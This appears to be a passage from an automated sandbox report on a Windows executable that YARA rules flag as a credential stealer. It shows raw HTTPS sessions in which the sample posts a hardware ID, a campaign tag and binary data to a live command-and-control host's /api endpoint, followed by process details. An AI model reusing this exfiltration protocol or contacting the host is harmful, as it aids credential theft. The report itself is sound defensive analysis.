                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 77 4e 2b 6b 69 43 35 61 54 30 59 56 55 6f 65 54 53 50 69 4c 7a 6e 52 35 66 33 56 39 34 51 61 54 2b 38 6a 42 4f 71 56 47 47 78 75 4b 69 75 37 42 61 51 68 47 55 46 77 48 77 62 78 44 33 35 62 65 59 47 51 34 62 54 58 31 54 70 6e 79 69 35 68 2b 72 46 73 52 48 34 69 50 36 34 34 6a 52 6b 64 4f 45 56 71 4f 6b 56 33 2b 69 4d 68 35 66 58 4e 67 65 2b 45 4b 6b 76 72 44 79 7a 54 76 47 6c 67 58 6d 4d 65 38 77 52 4a 46 54 6b 67 66 53 63 47 45 41 65 2f 47 77 6e 34 79 49 44 4a 33 34 67 36 52 38 73 66 4c 4e 71 35 59 46 68 65 46 6a 75 79 4a 4e 55 6c 46 51 42 31 52 6a 70 70 4c 38 34 50 42 64 58 5a 2b 66 54 75 69 54 70 6e 6d 69 35 68 2b 67 48 4d 74 55 71 47 39 70 4a 35 70 55 51 46 50 45 42 2f 5a 32 30 50 31 69 73 31 39 64 48 46 2b 63 65 55 46 6b 76 58 50 7a 44 65 71 55 68 6b
                                                                                                            Data Ascii: wN+kiC5aT0YVUoeTSPiLznR5f3V94QaT+8jBOqVGGxuKiu7BaQhGUFwHwbxD35beYGQ4bTX1Tpnyi5h+rFsRH4iP644jRkdOEVqOkV3+iMh5fXNge+EKkvrDyzTvGlgXmMe8wRJFTkgfScGEAe/Gwn4yIDJ34g6R8sfLNq5YFheFjuyJNUlFQB1RjppL84PBdXZ+fTuiTpnmi5h+gHMtUqG9pJ5pUQFPEB/Z20P1is19dHF+ceUFkvXPzDeqUhk
                                                                                                            2024-12-26 11:49:26 UTC914INData Raw: 6f 59 75 57 6b 39 46 45 31 65 4a 6b 6b 37 79 67 38 68 30 66 6e 4a 7a 66 4f 49 41 6c 72 36 46 67 44 6d 33 46 45 42 51 6f 5a 66 2f 6b 7a 46 46 59 45 55 54 48 35 37 56 56 72 61 42 79 54 49 71 4f 48 74 70 36 41 4f 4d 39 38 7a 4f 4d 61 78 47 47 52 32 4c 6c 65 4f 4f 49 30 39 4e 54 68 4e 5a 67 4a 35 46 2b 6f 48 41 65 58 31 30 4d 6a 57 73 43 59 61 2b 6b 34 41 51 70 45 63 50 45 34 36 4d 38 70 70 6e 56 77 39 52 58 46 69 4e 32 78 65 32 68 63 35 35 64 6e 68 2b 65 2b 67 44 6e 75 7a 45 78 7a 6d 6d 58 77 6f 61 68 34 44 76 69 53 78 48 52 31 6f 51 55 5a 4f 65 58 65 54 47 69 7a 4a 31 59 44 49 6a 72 44 69 5a 37 74 76 44 66 4a 35 43 47 77 61 4c 69 75 6a 42 4f 41 5a 59 43 42 74 54 77 63 4d 50 38 49 6e 4d 63 58 31 35 65 33 66 68 43 35 66 37 79 73 59 36 70 56 34 59 46 6f 61 47
                                                                                                            Data Ascii: oYuWk9FE1eJkk7yg8h0fnJzfOIAlr6FgDm3FEBQoZf/kzFFYEUTH57VVraByTIqOHtp6AOM98zOMaxGGR2LleOOI09NThNZgJ5F+oHAeX10MjWsCYa+k4AQpEcPE46M8ppnVw9RXFiN2xe2hc55dnh+e+gDnuzExzmmXwoah4DviSxHR1oQUZOeXeTGizJ1YDIjrDiZ7tvDfJ5CGwaLiujBOAZYCBtTwcMP8InMcX15e3fhC5f7ysY6pV4YFoaG
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 33 34 38 66 0d 0a 38 4e 35 63 58 4a 39 66 4f 6f 4b 6e 76 58 4d 7a 6a 69 71 58 78 46 51 7a 73 66 6a 6d 57 63 51 41 57 34 2f 54 5a 4f 70 51 66 57 64 68 57 30 38 59 54 4a 38 34 45 37 47 76 73 44 49 4d 62 31 52 45 52 69 45 6a 75 53 46 4c 55 56 47 53 42 6c 53 68 4a 39 42 38 6f 48 46 66 6e 31 2f 65 6e 54 6f 44 70 47 2b 68 59 41 35 74 78 52 41 55 4b 43 4d 38 71 41 70 51 31 4d 49 41 78 47 59 32 30 6a 36 78 70 30 79 66 48 46 7a 63 2b 49 43 6c 76 72 5a 77 44 57 6d 57 78 6b 66 67 49 54 6c 69 79 39 61 52 30 67 58 56 34 61 54 53 2f 69 55 78 48 30 79 4e 6a 4a 38 39 45 37 47 76 76 72 57 4f 61 68 62 57 6a 6d 48 6e 4f 57 4c 4a 45 4e 4e 43 41 4d 52 6d 4e 74 49 2b 73 61 64 4d 6e 39 30 66 33 2f 2b 41 70 37 2b 77 73 63 30 76 56 73 58 48 59 4f 48 34 5a 4d 6d 57 6b 35 44 47 56
                                                                                                            Data Ascii: 348f8N5cXJ9fOoKnvXMzjiqXxFQzsfjmWcQAW4/TZOpQfWdhW08YTJ84E7GvsDIMb1RERiEjuSFLUVGSBlShJ9B8oHFfn1/enToDpG+hYA5txRAUKCM8qApQ1MIAxGY20j6xp0yfHFzc+IClvrZwDWmWxkfgITliy9aR0gXV4aTS/iUxH0yNjJ89E7GvvrWOahbWjmHnOWLJENNCAMRmNtI+sadMn90f3/+Ap7+wsc0vVsXHYOH4ZMmWk5DGV
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 35 49 33 58 65 58 70 37 66 48 50 6c 44 70 44 2b 79 73 30 2b 37 78 70 59 46 35 6a 48 76 4d 45 43 61 31 5a 65 46 68 32 69 6a 46 6e 38 67 63 6c 6b 65 58 6c 78 62 65 45 65 33 72 43 4c 30 54 6d 2b 46 45 41 47 6b 4a 44 6a 6e 6d 6c 52 41 55 38 51 48 39 6e 62 52 50 6d 49 79 48 6c 32 63 58 64 7a 37 77 75 62 39 4d 66 4d 50 36 64 64 45 68 57 46 67 65 36 43 4b 55 64 41 52 42 68 57 6a 35 49 50 75 4d 62 43 61 6a 49 67 4d 6b 33 38 43 59 62 7a 32 34 49 4d 72 45 55 4a 42 59 32 58 34 73 4d 49 53 30 31 4c 47 56 69 52 32 31 43 34 6e 34 56 31 66 6a 67 71 4f 2b 77 4b 6b 76 33 4d 7a 6a 47 69 57 78 38 62 6a 34 33 71 6b 79 68 4e 53 55 51 55 55 70 4f 52 52 65 53 50 7a 48 39 38 63 47 42 34 72 45 44 65 2b 64 4f 41 5a 75 39 6d 45 68 4f 4d 6b 65 6d 4f 5a 31 63 50 55 56 78 59 6a 64 73
                                                                                                            Data Ascii: 5I3XeXp7fHPlDpD+ys0+7xpYF5jHvMECa1ZeFh2ijFn8gclkeXlxbeEe3rCL0Tm+FEAGkJDjnmlRAU8QH9nbRPmIyHl2cXdz7wub9MfMP6ddEhWFge6CKUdARBhWj5IPuMbCajIgMk38CYbz24IMrEUJBY2X4sMIS01LGViR21C4n4V1fjgqO+wKkv3MzjGiWx8bj43qkyhNSUQUUpORReSPzH98cGB4rEDe+dOAZu9mEhOMkemOZ1cPUVxYjds
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 54 49 38 4f 48 30 37 74 44 66 65 74 6f 76 2f 63 4f 39 4d 57 45 6a 41 73 75 65 50 4b 55 39 58 57 56 46 38 6c 6f 31 46 37 63 54 6a 64 57 4e 78 5a 48 62 2b 54 74 43 2b 7a 59 42 6d 2f 78 70 59 46 4a 48 48 76 4e 46 31 45 78 51 62 53 77 2f 54 68 41 48 76 78 74 4d 79 4b 69 6f 38 4f 2f 35 4f 78 72 36 4d 77 79 79 39 55 68 73 47 67 38 44 61 76 77 64 44 56 30 6b 52 56 49 32 6c 63 65 4f 46 79 33 78 31 62 6d 4d 37 6f 6b 36 52 76 70 50 35 66 75 63 55 4a 31 37 41 6e 36 54 5a 5a 33 31 43 52 68 4a 59 6c 34 6f 43 31 6f 33 54 63 33 39 7a 66 6a 6e 74 41 34 37 35 69 34 35 2b 71 52 52 41 51 4d 37 48 34 4a 42 6e 45 42 45 61 52 77 72 53 7a 42 2b 6b 6d 59 74 72 4d 6d 34 79 49 37 35 41 33 75 79 4c 6d 48 37 6f 56 77 6f 43 68 6f 54 79 67 6d 42 32 66 32 67 58 55 34 4b 58 54 76 48 47
                                                                                                            Data Ascii: TI8OH07tDfetov/cO9MWEjAsuePKU9XWVF8lo1F7cTjdWNxZHb+TtC+zYBm/xpYFJHHvNF1ExQbSw/ThAHvxtMyKio8O/5Oxr6Mwyy9UhsGg8DavwdDV0kRVI2lceOFy3x1bmM7ok6RvpP5fucUJ17An6TZZ31CRhJYl4oC1o3Tc39zfjntA475i45+qRRAQM7H4JBnEBEaRwrSzB+kmYtrMm4yI75A3uyLmH7oVwoChoTygmB2f2gXU4KXTvHG
                                                                                                            2024-12-26 11:49:26 UTC1369INData Raw: 41 69 4b 62 64 62 7a 61 6d 62 6b 69 48 68 54 56 67 47 77 4e 2b 32 7a 32 64 61 41 52 42 63 47 49 4b 4a 58 66 43 46 30 33 45 31 52 6b 78 64 37 77 6d 59 2f 63 58 58 4c 2b 31 37 47 78 75 4d 69 2b 4f 58 47 58 5a 55 53 78 4a 52 68 6f 31 65 74 73 69 46 66 54 49 67 53 7a 76 39 42 4a 6d 79 67 34 77 76 76 46 6f 54 42 6f 66 48 32 38 39 6e 55 41 45 51 58 47 71 43 6c 55 48 78 6b 4e 51 2f 56 48 74 31 66 65 38 41 69 65 2b 4c 6a 6e 36 70 46 45 42 43 7a 73 66 67 6b 47 63 51 45 52 70 48 43 74 4c 4d 48 36 53 5a 69 32 73 79 62 6a 49 6a 76 30 44 65 37 49 75 59 66 75 68 61 46 52 47 44 69 65 65 54 4e 55 35 43 58 68 38 59 76 36 56 71 2b 34 76 41 66 48 56 47 54 46 72 6d 48 70 50 78 7a 50 34 41 6d 45 55 66 41 4d 4b 68 35 35 63 6b 43 41 38 49 42 42 2f 5a 32 32 37 38 6c 73 68 39 64
                                                                                                            Data Ascii: AiKbdbzambkiHhTVgGwN+2z2daARBcGIKJXfCF03E1Rkxd7wmY/cXXL+17GxuMi+OXGXZUSxJRho1etsiFfTIgSzv9BJmyg4wvvFoTBofH289nUAEQXGqClUHxkNQ/VHt1fe8Aie+Ljn6pFEBCzsfgkGcQERpHCtLMH6SZi2sybjIjv0De7IuYfuhaFRGDieeTNU5CXh8Yv6Vq+4vAfHVGTFrmHpPxzP4AmEUfAMKh55ckCA8IBB/Z2278lsh9d


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.849707172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:49:28 UTC280OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=XHG9JAW63CJSAIPNS
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 12846
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:49:28 UTC12846OUTData Raw: 2d 2d 58 48 47 39 4a 41 57 36 33 43 4a 53 41 49 50 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 36 35 35 34 41 37 36 41 30 33 33 45 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 48 47 39 4a 41 57 36 33 43 4a 53 41 49 50 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 48 47 39 4a 41 57 36 33 43 4a 53 41 49 50 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                            Data Ascii: --XHG9JAW63CJSAIPNSContent-Disposition: form-data; name="hwid"D36554A76A033E98BEBA0C6A975F1733--XHG9JAW63CJSAIPNSContent-Disposition: form-data; name="pid"2--XHG9JAW63CJSAIPNSContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                            2024-12-26 11:49:48 UTC1128INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:49:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=i64fblafgm9bvfntee0fq6dfj6; expires=Mon, 21 Apr 2025 05:36:27 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJjiH8tMWfuZLl0HbZPWC30Lm5WCmVVzbUefwhvCWUzwy6RClAOlTD%2BMMQpogv28%2BiTp3b6EXq989bTq8iGqcZtWXYONYNZJm3W58RbuNTmRG9jFPXT%2BKefM5IErbeVk7rk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80d90678c14264-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1713&rtt_var=651&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13784&delivery_rate=1668571&cwnd=223&unsent_bytes=0&cid=9fcb402a78703aa3&ts=20539&x=0"
                                                                                                            2024-12-26 11:49:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-26 11:49:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.849711172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:49:50 UTC276OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=KYAYF5FBE89TQ
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15051
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:49:50 UTC15051OUTData Raw: 2d 2d 4b 59 41 59 46 35 46 42 45 38 39 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 36 35 35 34 41 37 36 41 30 33 33 45 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 59 41 59 46 35 46 42 45 38 39 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 59 41 59 46 35 46 42 45 38 39 54 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 59 41 59 46
                                                                                                            Data Ascii: --KYAYF5FBE89TQContent-Disposition: form-data; name="hwid"D36554A76A033E98BEBA0C6A975F1733--KYAYF5FBE89TQContent-Disposition: form-data; name="pid"2--KYAYF5FBE89TQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KYAYF


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.849713172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:50:12 UTC277OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=4HAC1AYLFTF0J3
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20224
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:50:12 UTC15331OUTData Raw: 2d 2d 34 48 41 43 31 41 59 4c 46 54 46 30 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 36 35 35 34 41 37 36 41 30 33 33 45 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 34 48 41 43 31 41 59 4c 46 54 46 30 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 48 41 43 31 41 59 4c 46 54 46 30 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 34 48
                                                                                                            Data Ascii: --4HAC1AYLFTF0J3Content-Disposition: form-data; name="hwid"D36554A76A033E98BEBA0C6A975F1733--4HAC1AYLFTF0J3Content-Disposition: form-data; name="pid"3--4HAC1AYLFTF0J3Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--4H
                                                                                                            2024-12-26 11:50:12 UTC4893OUTData Raw: 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                            2024-12-26 11:50:13 UTC1128INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:50:13 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=2jjlmspdrml7mdc9aq4o4o2a54; expires=Mon, 21 Apr 2025 05:36:52 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fF44mas9x8ePIDGFdcqoiAu5JDR0JvDbGrzknDfz0PiSTq2CBKWROJmkZE22Q%2B34AwoDd7Ak7iOmkLM04gY3HY4jP8S6LkDU0Ow4NdS4m4TMRzF%2FT%2FzaigBtPokrF9mvnI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80da1b3ad1430f-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1746&rtt_var=659&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21181&delivery_rate=1672394&cwnd=214&unsent_bytes=0&cid=ca9454c2ddbb7b45&ts=1090&x=0"
                                                                                                            2024-12-26 11:50:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-26 11:50:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.849714172.67.165.1854435272C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-26 11:50:15 UTC275OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=UAQF6MBLGQ601
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1181
                                                                                                            Host: mindhandru.buzz
                                                                                                            2024-12-26 11:50:15 UTC1181OUTData Raw: 2d 2d 55 41 51 46 36 4d 42 4c 47 51 36 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 36 35 35 34 41 37 36 41 30 33 33 45 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 41 51 46 36 4d 42 4c 47 51 36 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 41 51 46 36 4d 42 4c 47 51 36 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 41 51 46 36
                                                                                                            Data Ascii: --UAQF6MBLGQ601Content-Disposition: form-data; name="hwid"D36554A76A033E98BEBA0C6A975F1733--UAQF6MBLGQ601Content-Disposition: form-data; name="pid"1--UAQF6MBLGQ601Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--UAQF6
                                                                                                            2024-12-26 11:50:52 UTC1138INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 26 Dec 2024 11:50:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=8tnmu5l98j8f4origbmq4omvom; expires=Mon, 21 Apr 2025 05:37:30 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcgvPKKG%2F0pPmhFV6kI7U7tGVy39rtAZSK%2BNRLpn4PCcjNjSNUdBHeq%2F70hekIs1FkG3h%2B%2FOLn3M4Dvj6A%2B%2F8mVm3DmjXwAs0aHXrWLuPuO28AvA%2FT2272G3oC%2Bug5J5Svs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f80da2dec494326-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2071&rtt_var=794&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2092&delivery_rate=1363211&cwnd=178&unsent_bytes=0&cid=b8c6ffd204aa62d2&ts=36472&x=0"
                                                                                                            2024-12-26 11:50:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                            2024-12-26 11:50:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            050100s020406080100

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            050100s0.005101520MB

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            • File
                                                                                                            • Registry

                                                                                                            Click to dive into process behavior distribution

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:06:49:08
                                                                                                            Start date:26/12/2024
                                                                                                            Path:C:\Users\user\Desktop\P0SJULJxI0.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\P0SJULJxI0.exe"
                                                                                                            Imagebase:0xb50000
                                                                                                            File size:2'954'240 bytes
                                                                                                            MD5 hash:E5D4E86F709D076FA5BD3E10007F487F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2096219412.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2100238097.0000000001484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true
                                                                                                            Show Windows behavior

                                                                                                            File Activities

                                                                                                            Show Windows behavior

                                                                                                            Section Activities

                                                                                                            Show Windows behavior

                                                                                                            Registry Activities

                                                                                                            Show Windows behavior

                                                                                                            COM Activities

                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                            Show Windows behavior

                                                                                                            Process Activities

                                                                                                            Show Windows behavior

                                                                                                            Thread Activities

                                                                                                            Show Windows behavior

                                                                                                            Memory Activities

                                                                                                            Show Windows behavior

                                                                                                            System Activities

                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                            Show Windows behavior

                                                                                                            Windows UI Activities

                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                            Disassembly

                                                                                                            Non-executed Functions

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2506445308.0000000001462000.00000004.00000020.00020000.00000000.sdmp, Offset: 01462000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_1462000_P0SJULJxI0.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
